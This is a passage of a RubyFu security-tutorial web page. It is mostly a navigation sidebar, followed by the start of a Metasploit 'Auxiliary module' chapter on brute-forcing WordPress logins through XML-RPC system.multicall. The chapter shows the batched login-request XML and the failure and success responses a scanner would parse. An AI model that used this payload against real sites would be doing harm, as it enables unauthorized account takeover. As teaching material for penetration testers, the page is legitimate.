666
|
+
|
667
|
+
<b>4.</b>
|
668
|
+
|
669
|
+
Module 0x4 | Web Kung Fu
|
670
|
+
</a>
|
671
|
+
|
672
|
+
|
673
|
+
<ul class="articles">
|
674
|
+
|
675
|
+
|
676
|
+
<li class="chapter " data-level="4.1" data-path="module_0x4__web_kung_fu/sql_injection_scanner.html">
|
677
|
+
|
678
|
+
|
679
|
+
<a href="../module_0x4__web_kung_fu/sql_injection_scanner.html">
|
680
|
+
|
681
|
+
<i class="fa fa-check"></i>
|
682
|
+
|
683
|
+
<b>4.1.</b>
|
684
|
+
|
685
|
+
SQL Injection Scanner
|
686
|
+
</a>
|
687
|
+
|
688
|
+
|
689
|
+
</li>
|
690
|
+
|
691
|
+
<li class="chapter " data-level="4.2" data-path="module_0x4__web_kung_fu/databases.html">
|
692
|
+
|
693
|
+
|
694
|
+
<a href="../module_0x4__web_kung_fu/databases.html">
|
695
|
+
|
696
|
+
<i class="fa fa-check"></i>
|
697
|
+
|
698
|
+
<b>4.2.</b>
|
699
|
+
|
700
|
+
Databases
|
701
|
+
</a>
|
702
|
+
|
703
|
+
|
704
|
+
</li>
|
705
|
+
|
706
|
+
<li class="chapter " data-level="4.3" data-path="module_0x4__web_kung_fu/extending_burpsuite.html">
|
707
|
+
|
708
|
+
|
709
|
+
<a href="../module_0x4__web_kung_fu/extending_burpsuite.html">
|
710
|
+
|
711
|
+
<i class="fa fa-check"></i>
|
712
|
+
|
713
|
+
<b>4.3.</b>
|
714
|
+
|
715
|
+
Extending Burp Suite
|
716
|
+
</a>
|
717
|
+
|
718
|
+
|
719
|
+
</li>
|
720
|
+
|
721
|
+
<li class="chapter " data-level="4.4" data-path="module_0x4__web_kung_fu/browser_manipulation.html">
|
722
|
+
|
723
|
+
|
724
|
+
<a href="../module_0x4__web_kung_fu/browser_manipulation.html">
|
725
|
+
|
726
|
+
<i class="fa fa-check"></i>
|
727
|
+
|
728
|
+
<b>4.4.</b>
|
729
|
+
|
730
|
+
Browser Manipulation
|
731
|
+
</a>
|
732
|
+
|
733
|
+
|
734
|
+
</li>
|
735
|
+
|
736
|
+
<li class="chapter " data-level="4.5" data-path="module_0x4__web_kung_fu/web_servcies_and_apis.html">
|
737
|
+
|
738
|
+
|
739
|
+
<a href="../module_0x4__web_kung_fu/web_servcies_and_apis.html">
|
740
|
+
|
741
|
+
<i class="fa fa-check"></i>
|
742
|
+
|
743
|
+
<b>4.5.</b>
|
744
|
+
|
745
|
+
Web Services and APIs
|
746
|
+
</a>
|
747
|
+
|
748
|
+
|
749
|
+
<ul class="articles">
|
750
|
+
|
751
|
+
|
752
|
+
<li class="chapter " data-level="4.5.1" data-path="module_0x4__web_kung_fu/web_services.html">
|
753
|
+
|
754
|
+
|
755
|
+
<a href="../module_0x4__web_kung_fu/web_services.html">
|
756
|
+
|
757
|
+
<i class="fa fa-check"></i>
|
758
|
+
|
759
|
+
<b>4.5.1.</b>
|
760
|
+
|
761
|
+
Interacting with Web Services
|
762
|
+
</a>
|
763
|
+
|
764
|
+
|
765
|
+
</li>
|
766
|
+
|
767
|
+
<li class="chapter " data-level="4.5.2" data-path="module_0x4__web_kung_fu/interacting_with_apis.html">
|
768
|
+
|
769
|
+
|
770
|
+
<a href="../module_0x4__web_kung_fu/interacting_with_apis.html">
|
771
|
+
|
772
|
+
<i class="fa fa-check"></i>
|
773
|
+
|
774
|
+
<b>4.5.2.</b>
|
775
|
+
|
776
|
+
Interacting with APIs
|
777
|
+
</a>
|
778
|
+
|
779
|
+
|
780
|
+
<ul class="articles">
|
781
|
+
|
782
|
+
|
783
|
+
<li class="chapter " data-level="4.5.2.1" data-path="module_0x4__web_kung_fu/wordpress_api.html">
|
784
|
+
|
785
|
+
|
786
|
+
<a href="../module_0x4__web_kung_fu/wordpress_api.html">
|
787
|
+
|
788
|
+
<i class="fa fa-check"></i>
|
789
|
+
|
790
|
+
<b>4.5.2.1.</b>
|
791
|
+
|
792
|
+
WordPress API
|
793
|
+
</a>
|
794
|
+
|
795
|
+
|
796
|
+
</li>
|
797
|
+
|
798
|
+
<li class="chapter " data-level="4.5.2.2" data-path="module_0x4__web_kung_fu/twitter_api.html">
|
799
|
+
|
800
|
+
|
801
|
+
<a href="../module_0x4__web_kung_fu/twitter_api.html">
|
802
|
+
|
803
|
+
<i class="fa fa-check"></i>
|
804
|
+
|
805
|
+
<b>4.5.2.2.</b>
|
806
|
+
|
807
|
+
Twitter API
|
808
|
+
</a>
|
809
|
+
|
810
|
+
|
811
|
+
</li>
|
812
|
+
|
813
|
+
|
814
|
+
</ul>
|
815
|
+
|
816
|
+
</li>
|
817
|
+
|
818
|
+
|
819
|
+
</ul>
|
820
|
+
|
821
|
+
</li>
|
822
|
+
|
823
|
+
<li class="chapter " data-level="4.6" data-path="module_0x4__web_kung_fu/ruby2javascript.html">
|
824
|
+
|
825
|
+
|
826
|
+
<a href="../module_0x4__web_kung_fu/ruby2javascript.html">
|
827
|
+
|
828
|
+
<i class="fa fa-check"></i>
|
829
|
+
|
830
|
+
<b>4.6.</b>
|
831
|
+
|
832
|
+
Ruby 2 JavaScript
|
833
|
+
</a>
|
834
|
+
|
835
|
+
|
836
|
+
</li>
|
837
|
+
|
838
|
+
<li class="chapter " data-level="4.7" data-path="module_0x4__web_kung_fu/web_server_and_proxy.html">
|
839
|
+
|
840
|
+
|
841
|
+
<a href="../module_0x4__web_kung_fu/web_server_and_proxy.html">
|
842
|
+
|
843
|
+
<i class="fa fa-check"></i>
|
844
|
+
|
845
|
+
<b>4.7.</b>
|
846
|
+
|
847
|
+
Web Server and Proxy
|
848
|
+
</a>
|
849
|
+
|
850
|
+
|
851
|
+
</li>
|
852
|
+
|
853
|
+
|
854
|
+
</ul>
|
855
|
+
|
856
|
+
</li>
|
857
|
+
|
858
|
+
<li class="chapter " data-level="5" data-path="module_0x5__exploitation_kung_fu/index.html">
|
859
|
+
|
860
|
+
|
861
|
+
<a href="../module_0x5__exploitation_kung_fu/index.html">
|
862
|
+
|
863
|
+
<i class="fa fa-check"></i>
|
864
|
+
|
865
|
+
<b>5.</b>
|
866
|
+
|
867
|
+
Module 0x5 | Exploitation Kung Fu
|
868
|
+
</a>
|
869
|
+
|
870
|
+
|
871
|
+
<ul class="articles">
|
872
|
+
|
873
|
+
|
874
|
+
<li class="chapter " data-level="5.1" data-path="module_0x5__exploitation_kung_fu/fuzzer.html">
|
875
|
+
|
876
|
+
|
877
|
+
<a href="../module_0x5__exploitation_kung_fu/fuzzer.html">
|
878
|
+
|
879
|
+
<i class="fa fa-check"></i>
|
880
|
+
|
881
|
+
<b>5.1.</b>
|
882
|
+
|
883
|
+
Fuzzer
|
884
|
+
</a>
|
885
|
+
|
886
|
+
|
887
|
+
</li>
|
888
|
+
|
889
|
+
<li class="chapter " data-level="5.2" data-path="module_0x5__exploitation_kung_fu/metasploit.html">
|
890
|
+
|
891
|
+
|
892
|
+
<a href="../module_0x5__exploitation_kung_fu/metasploit.html">
|
893
|
+
|
894
|
+
<i class="fa fa-check"></i>
|
895
|
+
|
896
|
+
<b>5.2.</b>
|
897
|
+
|
898
|
+
Metasploit
|
899
|
+
</a>
|
900
|
+
|
901
|
+
|
902
|
+
<ul class="articles">
|
903
|
+
|
904
|
+
|
905
|
+
<li class="chapter active" data-level="5.2.1" data-path="module_0x5__exploitation_kung_fu/auxiliary_module.html">
|
906
|
+
|
907
|
+
|
908
|
+
<a href="../module_0x5__exploitation_kung_fu/auxiliary_module.html">
|
909
|
+
|
910
|
+
<i class="fa fa-check"></i>
|
911
|
+
|
912
|
+
<b>5.2.1.</b>
|
913
|
+
|
914
|
+
Auxiliary module
|
915
|
+
</a>
|
916
|
+
|
917
|
+
|
918
|
+
</li>
|
919
|
+
|
920
|
+
<li class="chapter " data-level="5.2.2" data-path="module_0x5__exploitation_kung_fu/exploit_module.html">
|
921
|
+
|
922
|
+
|
923
|
+
<a href="../module_0x5__exploitation_kung_fu/exploit_module.html">
|
924
|
+
|
925
|
+
<i class="fa fa-check"></i>
|
926
|
+
|
927
|
+
<b>5.2.2.</b>
|
928
|
+
|
929
|
+
Exploit module
|
930
|
+
</a>
|
931
|
+
|
932
|
+
|
933
|
+
</li>
|
934
|
+
|
935
|
+
<li class="chapter " data-level="5.2.3" data-path="module_0x5__exploitation_kung_fu/meterpreter.html">
|
936
|
+
|
937
|
+
|
938
|
+
<a href="../module_0x5__exploitation_kung_fu/meterpreter.html">
|
939
|
+
|
940
|
+
<i class="fa fa-check"></i>
|
941
|
+
|
942
|
+
<b>5.2.3.</b>
|
943
|
+
|
944
|
+
Meterpreter
|
945
|
+
</a>
|
946
|
+
|
947
|
+
|
948
|
+
<ul class="articles">
|
949
|
+
|
950
|
+
|
951
|
+
<li class="chapter " data-level="5.2.3.1" data-path="module_0x5__exploitation_kung_fu/extensions.html">
|
952
|
+
|
953
|
+
|
954
|
+
<a href="../module_0x5__exploitation_kung_fu/extensions.html">
|
955
|
+
|
956
|
+
<i class="fa fa-check"></i>
|
957
|
+
|
958
|
+
<b>5.2.3.1.</b>
|
959
|
+
|
960
|
+
API and Extensions
|
961
|
+
</a>
|
962
|
+
|
963
|
+
|
964
|
+
</li>
|
965
|
+
|
966
|
+
<li class="chapter " data-level="5.2.3.2" data-path="module_0x5__exploitation_kung_fu/meterpreter_scripting.html">
|
967
|
+
|
968
|
+
|
969
|
+
<a href="../module_0x5__exploitation_kung_fu/meterpreter_scripting.html">
|
970
|
+
|
971
|
+
<i class="fa fa-check"></i>
|
972
|
+
|
973
|
+
<b>5.2.3.2.</b>
|
974
|
+
|
975
|
+
Meterpreter Scripting
|
976
|
+
</a>
|
977
|
+
|
978
|
+
|
979
|
+
</li>
|
980
|
+
|
981
|
+
<li class="chapter " data-level="5.2.3.3" data-path="module_0x5__exploitation_kung_fu/railgun_api_extension.html">
|
982
|
+
|
983
|
+
|
984
|
+
<a href="../module_0x5__exploitation_kung_fu/railgun_api_extension.html">
|
985
|
+
|
986
|
+
<i class="fa fa-check"></i>
|
987
|
+
|
988
|
+
<b>5.2.3.3.</b>
|
989
|
+
|
990
|
+
Railgun API Extension
|
991
|
+
</a>
|
992
|
+
|
993
|
+
|
994
|
+
</li>
|
995
|
+
|
996
|
+
|
997
|
+
</ul>
|
998
|
+
|
999
|
+
</li>
|
1000
|
+
|
1001
|
+
|
1002
|
+
</ul>
|
1003
|
+
|
1004
|
+
</li>
|
1005
|
+
|
1006
|
+
<li class="chapter " data-level="5.3" data-path="module_0x5__exploitation_kung_fu/metasm.html">
|
1007
|
+
|
1008
|
+
|
1009
|
+
<a href="../module_0x5__exploitation_kung_fu/metasm.html">
|
1010
|
+
|
1011
|
+
<i class="fa fa-check"></i>
|
1012
|
+
|
1013
|
+
<b>5.3.</b>
|
1014
|
+
|
1015
|
+
metasm
|
1016
|
+
</a>
|
1017
|
+
|
1018
|
+
|
1019
|
+
</li>
|
1020
|
+
|
1021
|
+
|
1022
|
+
</ul>
|
1023
|
+
|
1024
|
+
</li>
|
1025
|
+
|
1026
|
+
<li class="chapter " data-level="6" data-path="module_0x6__forensic/index.html">
|
1027
|
+
|
1028
|
+
|
1029
|
+
<a href="../module_0x6__forensic/index.html">
|
1030
|
+
|
1031
|
+
<i class="fa fa-check"></i>
|
1032
|
+
|
1033
|
+
<b>6.</b>
|
1034
|
+
|
1035
|
+
Module 0x6 | Forensic Kung Fu
|
1036
|
+
</a>
|
1037
|
+
|
1038
|
+
|
1039
|
+
<ul class="articles">
|
1040
|
+
|
1041
|
+
|
1042
|
+
<li class="chapter " data-level="6.1" data-path="module_0x6__forensic/windows_forensic.html">
|
1043
|
+
|
1044
|
+
|
1045
|
+
<a href="../module_0x6__forensic/windows_forensic.html">
|
1046
|
+
|
1047
|
+
<i class="fa fa-check"></i>
|
1048
|
+
|
1049
|
+
<b>6.1.</b>
|
1050
|
+
|
1051
|
+
Windows Forensic
|
1052
|
+
</a>
|
1053
|
+
|
1054
|
+
|
1055
|
+
</li>
|
1056
|
+
|
1057
|
+
<li class="chapter " data-level="6.2" data-path="module_0x6__forensic/android_forensic.html">
|
1058
|
+
|
1059
|
+
|
1060
|
+
<a href="../module_0x6__forensic/android_forensic.html">
|
1061
|
+
|
1062
|
+
<i class="fa fa-check"></i>
|
1063
|
+
|
1064
|
+
<b>6.2.</b>
|
1065
|
+
|
1066
|
+
Android Forensic
|
1067
|
+
</a>
|
1068
|
+
|
1069
|
+
|
1070
|
+
</li>
|
1071
|
+
|
1072
|
+
<li class="chapter " data-level="6.3" data-path="module_0x3__network_kung_fu/network_traffic_analysis.html">
|
1073
|
+
|
1074
|
+
|
1075
|
+
<a href="../module_0x3__network_kung_fu/network_traffic_analysis.html">
|
1076
|
+
|
1077
|
+
<i class="fa fa-check"></i>
|
1078
|
+
|
1079
|
+
<b>6.3.</b>
|
1080
|
+
|
1081
|
+
Network Traffic Analysis
|
1082
|
+
</a>
|
1083
|
+
|
1084
|
+
|
1085
|
+
</li>
|
1086
|
+
|
1087
|
+
<li class="chapter " data-level="6.4" data-path="module_0x6__forensic/parsing_log_files.html">
|
1088
|
+
|
1089
|
+
|
1090
|
+
<a href="../module_0x6__forensic/parsing_log_files.html">
|
1091
|
+
|
1092
|
+
<i class="fa fa-check"></i>
|
1093
|
+
|
1094
|
+
<b>6.4.</b>
|
1095
|
+
|
1096
|
+
Parsing Log Files
|
1097
|
+
</a>
|
1098
|
+
|
1099
|
+
|
1100
|
+
</li>
|
1101
|
+
|
1102
|
+
|
1103
|
+
</ul>
|
1104
|
+
|
1105
|
+
</li>
|
1106
|
+
|
1107
|
+
<li class="chapter " data-level="7" data-path="references/index.html">
|
1108
|
+
|
1109
|
+
|
1110
|
+
<a href="../references/index.html">
|
1111
|
+
|
1112
|
+
<i class="fa fa-check"></i>
|
1113
|
+
|
1114
|
+
<b>7.</b>
|
1115
|
+
|
1116
|
+
References
|
1117
|
+
</a>
|
1118
|
+
|
1119
|
+
|
1120
|
+
</li>
|
1121
|
+
|
1122
|
+
<li class="chapter " data-level="8" data-path="faqs/index.html">
|
1123
|
+
|
1124
|
+
|
1125
|
+
<a href="../faqs/index.html">
|
1126
|
+
|
1127
|
+
<i class="fa fa-check"></i>
|
1128
|
+
|
1129
|
+
<b>8.</b>
|
1130
|
+
|
1131
|
+
FAQs
|
1132
|
+
</a>
|
1133
|
+
|
1134
|
+
|
1135
|
+
</li>
|
1136
|
+
|
1137
|
+
<li class="chapter " data-level="9" data-path="contributors/index.html">
|
1138
|
+
|
1139
|
+
|
1140
|
+
<a href="../contributors/index.html">
|
1141
|
+
|
1142
|
+
<i class="fa fa-check"></i>
|
1143
|
+
|
1144
|
+
<b>9.</b>
|
1145
|
+
|
1146
|
+
Contributors
|
1147
|
+
</a>
|
1148
|
+
|
1149
|
+
|
1150
|
+
<ul class="articles">
|
1151
|
+
|
1152
|
+
|
1153
|
+
<li class="chapter " data-level="9.1" data-path="contributors/todo.html">
|
1154
|
+
|
1155
|
+
|
1156
|
+
<a href="../contributors/todo.html">
|
1157
|
+
|
1158
|
+
<i class="fa fa-check"></i>
|
1159
|
+
|
1160
|
+
<b>9.1.</b>
|
1161
|
+
|
1162
|
+
TODO
|
1163
|
+
</a>
|
1164
|
+
|
1165
|
+
|
1166
|
+
</li>
|
1167
|
+
|
1168
|
+
|
1169
|
+
</ul>
|
1170
|
+
|
1171
|
+
</li>
|
1172
|
+
|
1173
|
+
|
1174
|
+
|
1175
|
+
|
1176
|
+
<li class="divider"></li>
|
1177
|
+
<li>
|
1178
|
+
<a href="https://www.gitbook.com" target="blank" class="gitbook-link">
|
1179
|
+
Published with GitBook
|
1180
|
+
</a>
|
1181
|
+
</li>
|
1182
|
+
|
1183
|
+
</ul>
|
1184
|
+
</nav>
|
1185
|
+
</div>
|
1186
|
+
|
1187
|
+
<div class="book-body">
|
1188
|
+
<div class="body-inner">
|
1189
|
+
<div class="book-header" role="navigation">
|
1190
|
+
<!-- Actions Left -->
|
1191
|
+
|
1192
|
+
|
1193
|
+
<!-- Title -->
|
1194
|
+
<h1>
|
1195
|
+
<i class="fa fa-circle-o-notch fa-spin"></i>
|
1196
|
+
<a href="../" >RubyFu</a>
|
1197
|
+
</h1>
|
1198
|
+
</div>
|
1199
|
+
|
1200
|
+
<div class="page-wrapper" tabindex="-1" role="main">
|
1201
|
+
<div class="page-inner">
|
1202
|
+
|
1203
|
+
|
1204
|
+
<section class="normal" id="section-">
|
1205
|
+
|
1206
|
+
<h1 id="auxiliary-module"><a name="auxiliary-module" class="plugin-anchor" href="#auxiliary-module"><span class="fa fa-link"></span></a>Auxiliary module</h1>
|
1207
|
+
<h2 id="scanner"><a name="scanner" class="plugin-anchor" href="#scanner"><span class="fa fa-link"></span></a>Scanner</h2>
|
1208
|
+
<p>Basic Scanner modules</p>
|
1209
|
+
<h3 id="wordpress-xmlrpc-massive-brute-force"><a name="wordpress-xmlrpc-massive-brute-force" class="plugin-anchor" href="#wordpress-xmlrpc-massive-brute-force"><span class="fa fa-link"></span></a>WordPress XML-RPC Massive Brute Force</h3>
|
1210
|
+
<p>WordPress CMS framework support XML-RPC service to interact with almost all functions in the framework. Some functions require authentication. The main issues lies in the you can authenticate many times within the same request. WordPress accepts about 1788 lines of XML request which allows us to send tremendous number of login tries in a single request. So how awesome is this? Let me explain. </p>
|
1211
|
+
<p>Imagine that you have to brute force one user with 6000 passwords? How many requests you have to send in the normal brute force technique? It's 6000 requests. Using our module will need to 4 requests only of you use the default CHUNKSIZE which is 1500 password per request!!!. NO MULTI-THREADING even you use multi-threading in the traditional brute force technique you'll send 6000 request a few of its are parallel.</p>
|
1212
|
+
<pre><code class="lang-xml"><span class="hljs-pi"><?xml version="1.0"?></span>
|
1213
|
+
<span class="hljs-tag"><<span class="hljs-title">methodCall</span>></span>
|
1214
|
+
<span class="hljs-tag"><<span class="hljs-title">methodName</span>></span>system.multicall<span class="hljs-tag"></<span class="hljs-title">methodName</span>></span>
|
1215
|
+
<span class="hljs-tag"><<span class="hljs-title">params</span>></span>
|
1216
|
+
<span class="hljs-tag"><<span class="hljs-title">param</span>></span><span class="hljs-tag"><<span class="hljs-title">value</span>></span><span class="hljs-tag"><<span class="hljs-title">array</span>></span><span class="hljs-tag"><<span class="hljs-title">data</span>></span>
|
1217
|
+
|
1218
|
+
|
1219
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span><span class="hljs-tag"><<span class="hljs-title">struct</span>></span>
|
1220
|
+
<span class="hljs-tag"><<span class="hljs-title">member</span>></span>
|
1221
|
+
<span class="hljs-tag"><<span class="hljs-title">name</span>></span>methodName<span class="hljs-tag"></<span class="hljs-title">name</span>></span>
|
1222
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span><span class="hljs-tag"><<span class="hljs-title">string</span>></span>wp.getUsersBlogs<span class="hljs-tag"></<span class="hljs-title">string</span>></span><span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1223
|
+
<span class="hljs-tag"></<span class="hljs-title">member</span>></span>
|
1224
|
+
<span class="hljs-tag"><<span class="hljs-title">member</span>></span>
|
1225
|
+
<span class="hljs-tag"><<span class="hljs-title">name</span>></span>params<span class="hljs-tag"></<span class="hljs-title">name</span>></span><span class="hljs-tag"><<span class="hljs-title">value</span>></span><span class="hljs-tag"><<span class="hljs-title">array</span>></span><span class="hljs-tag"><<span class="hljs-title">data</span>></span>
|
1226
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span><span class="hljs-tag"><<span class="hljs-title">array</span>></span><span class="hljs-tag"><<span class="hljs-title">data</span>></span>
|
1227
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span><span class="hljs-tag"><<span class="hljs-title">string</span>></span>"USER #1"<span class="hljs-tag"></<span class="hljs-title">string</span>></span><span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1228
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span><span class="hljs-tag"><<span class="hljs-title">string</span>></span>"PASS #1"<span class="hljs-tag"></<span class="hljs-title">string</span>></span><span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1229
|
+
<span class="hljs-tag"></<span class="hljs-title">data</span>></span><span class="hljs-tag"></<span class="hljs-title">array</span>></span><span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1230
|
+
<span class="hljs-tag"></<span class="hljs-title">data</span>></span><span class="hljs-tag"></<span class="hljs-title">array</span>></span><span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1231
|
+
<span class="hljs-tag"></<span class="hljs-title">member</span>></span>
|
1232
|
+
|
1233
|
+
...Snippet...
|
1234
|
+
|
1235
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span><span class="hljs-tag"><<span class="hljs-title">struct</span>></span>
|
1236
|
+
<span class="hljs-tag"><<span class="hljs-title">member</span>></span>
|
1237
|
+
<span class="hljs-tag"><<span class="hljs-title">name</span>></span>methodName<span class="hljs-tag"></<span class="hljs-title">name</span>></span>
|
1238
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span><span class="hljs-tag"><<span class="hljs-title">string</span>></span>wp.getUsersBlogs<span class="hljs-tag"></<span class="hljs-title">string</span>></span><span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1239
|
+
<span class="hljs-tag"></<span class="hljs-title">member</span>></span>
|
1240
|
+
<span class="hljs-tag"><<span class="hljs-title">member</span>></span>
|
1241
|
+
<span class="hljs-tag"><<span class="hljs-title">name</span>></span>params<span class="hljs-tag"></<span class="hljs-title">name</span>></span><span class="hljs-tag"><<span class="hljs-title">value</span>></span><span class="hljs-tag"><<span class="hljs-title">array</span>></span><span class="hljs-tag"><<span class="hljs-title">data</span>></span>
|
1242
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span><span class="hljs-tag"><<span class="hljs-title">array</span>></span><span class="hljs-tag"><<span class="hljs-title">data</span>></span>
|
1243
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span><span class="hljs-tag"><<span class="hljs-title">string</span>></span>"USER #1"<span class="hljs-tag"></<span class="hljs-title">string</span>></span><span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1244
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span><span class="hljs-tag"><<span class="hljs-title">string</span>></span>"PASS #N"<span class="hljs-tag"></<span class="hljs-title">string</span>></span><span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1245
|
+
<span class="hljs-tag"></<span class="hljs-title">data</span>></span><span class="hljs-tag"></<span class="hljs-title">array</span>></span><span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1246
|
+
<span class="hljs-tag"></<span class="hljs-title">data</span>></span><span class="hljs-tag"></<span class="hljs-title">array</span>></span><span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1247
|
+
<span class="hljs-tag"></<span class="hljs-title">member</span>></span>
|
1248
|
+
|
1249
|
+
|
1250
|
+
<span class="hljs-tag"></<span class="hljs-title">params</span>></span>
|
1251
|
+
<span class="hljs-tag"></<span class="hljs-title">methodCall</span>></span>
|
1252
|
+
</code></pre>
|
1253
|
+
<p>So from above you can understand how the XML request will be build. Now How the reply will be?
|
1254
|
+
To simplify this we'll test a single user once with wrong password another with correct password to understand the response behavior </p>
|
1255
|
+
<p><strong>wrong password response</strong></p>
|
1256
|
+
<pre><code class="lang-xml"><span class="hljs-pi"><?xml version="1.0" encoding="UTF-8"?></span>
|
1257
|
+
<span class="hljs-tag"><<span class="hljs-title">methodResponse</span>></span>
|
1258
|
+
<span class="hljs-tag"><<span class="hljs-title">params</span>></span>
|
1259
|
+
<span class="hljs-tag"><<span class="hljs-title">param</span>></span>
|
1260
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span>
|
1261
|
+
<span class="hljs-tag"><<span class="hljs-title">array</span>></span>
|
1262
|
+
<span class="hljs-tag"><<span class="hljs-title">data</span>></span>
|
1263
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span>
|
1264
|
+
<span class="hljs-tag"><<span class="hljs-title">struct</span>></span>
|
1265
|
+
<span class="hljs-tag"><<span class="hljs-title">member</span>></span>
|
1266
|
+
<span class="hljs-tag"><<span class="hljs-title">name</span>></span>faultCode<span class="hljs-tag"></<span class="hljs-title">name</span>></span>
|
1267
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span>
|
1268
|
+
<span class="hljs-tag"><<span class="hljs-title">int</span>></span>403<span class="hljs-tag"></<span class="hljs-title">int</span>></span>
|
1269
|
+
<span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1270
|
+
<span class="hljs-tag"></<span class="hljs-title">member</span>></span>
|
1271
|
+
<span class="hljs-tag"><<span class="hljs-title">member</span>></span>
|
1272
|
+
<span class="hljs-tag"><<span class="hljs-title">name</span>></span>faultString<span class="hljs-tag"></<span class="hljs-title">name</span>></span>
|
1273
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span>
|
1274
|
+
<span class="hljs-tag"><<span class="hljs-title">string</span>></span>Incorrect username or password.<span class="hljs-tag"></<span class="hljs-title">string</span>></span>
|
1275
|
+
<span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1276
|
+
<span class="hljs-tag"></<span class="hljs-title">member</span>></span>
|
1277
|
+
<span class="hljs-tag"></<span class="hljs-title">struct</span>></span>
|
1278
|
+
<span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1279
|
+
<span class="hljs-tag"></<span class="hljs-title">data</span>></span>
|
1280
|
+
<span class="hljs-tag"></<span class="hljs-title">array</span>></span>
|
1281
|
+
<span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1282
|
+
<span class="hljs-tag"></<span class="hljs-title">param</span>></span>
|
1283
|
+
<span class="hljs-tag"></<span class="hljs-title">params</span>></span>
|
1284
|
+
<span class="hljs-tag"></<span class="hljs-title">methodResponse</span>></span>
|
1285
|
+
</code></pre>
|
1286
|
+
<p>We noticed the following </p>
|
1287
|
+
<ul>
|
1288
|
+
<li><code><name>faultCode</name></code></li>
|
1289
|
+
<li><code><int>403</int></code></li>
|
1290
|
+
<li><code><string>Incorrect username or password.</string></code></li>
|
1291
|
+
</ul>
|
1292
|
+
<p>Usually we rely one the string response '<em>Incorrect username or password.</em>', but what if the WordPress language wasn't English? so the best thing is the integer response which is <code>403</code></p>
|
1293
|
+
<p><strong>correct password response</strong></p>
|
1294
|
+
<pre><code class="lang-xml"><span class="hljs-pi"><?xml version="1.0" encoding="UTF-8"?></span>
|
1295
|
+
<span class="hljs-tag"><<span class="hljs-title">methodResponse</span>></span>
|
1296
|
+
<span class="hljs-tag"><<span class="hljs-title">params</span>></span>
|
1297
|
+
<span class="hljs-tag"><<span class="hljs-title">param</span>></span>
|
1298
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span>
|
1299
|
+
<span class="hljs-tag"><<span class="hljs-title">array</span>></span>
|
1300
|
+
<span class="hljs-tag"><<span class="hljs-title">data</span>></span>
|
1301
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span>
|
1302
|
+
<span class="hljs-tag"><<span class="hljs-title">array</span>></span>
|
1303
|
+
<span class="hljs-tag"><<span class="hljs-title">data</span>></span>
|
1304
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span>
|
1305
|
+
<span class="hljs-tag"><<span class="hljs-title">array</span>></span>
|
1306
|
+
<span class="hljs-tag"><<span class="hljs-title">data</span>></span>
|
1307
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span>
|
1308
|
+
<span class="hljs-tag"><<span class="hljs-title">struct</span>></span>
|
1309
|
+
<span class="hljs-tag"><<span class="hljs-title">member</span>></span>
|
1310
|
+
<span class="hljs-tag"><<span class="hljs-title">name</span>></span>isAdmin<span class="hljs-tag"></<span class="hljs-title">name</span>></span>
|
1311
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span>
|
1312
|
+
<span class="hljs-tag"><<span class="hljs-title">boolean</span>></span>1<span class="hljs-tag"></<span class="hljs-title">boolean</span>></span>
|
1313
|
+
<span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1314
|
+
<span class="hljs-tag"></<span class="hljs-title">member</span>></span>
|
1315
|
+
<span class="hljs-tag"><<span class="hljs-title">member</span>></span>
|
1316
|
+
<span class="hljs-tag"><<span class="hljs-title">name</span>></span>url<span class="hljs-tag"></<span class="hljs-title">name</span>></span>
|
1317
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span>
|
1318
|
+
<span class="hljs-tag"><<span class="hljs-title">string</span>></span>http://172.17.0.3/<span class="hljs-tag"></<span class="hljs-title">string</span>></span>
|
1319
|
+
<span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1320
|
+
<span class="hljs-tag"></<span class="hljs-title">member</span>></span>
|
1321
|
+
<span class="hljs-tag"><<span class="hljs-title">member</span>></span>
|
1322
|
+
<span class="hljs-tag"><<span class="hljs-title">name</span>></span>blogid<span class="hljs-tag"></<span class="hljs-title">name</span>></span>
|
1323
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span>
|
1324
|
+
<span class="hljs-tag"><<span class="hljs-title">string</span>></span>1<span class="hljs-tag"></<span class="hljs-title">string</span>></span>
|
1325
|
+
<span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1326
|
+
<span class="hljs-tag"></<span class="hljs-title">member</span>></span>
|
1327
|
+
<span class="hljs-tag"><<span class="hljs-title">member</span>></span>
|
1328
|
+
<span class="hljs-tag"><<span class="hljs-title">name</span>></span>blogName<span class="hljs-tag"></<span class="hljs-title">name</span>></span>
|
1329
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span>
|
1330
|
+
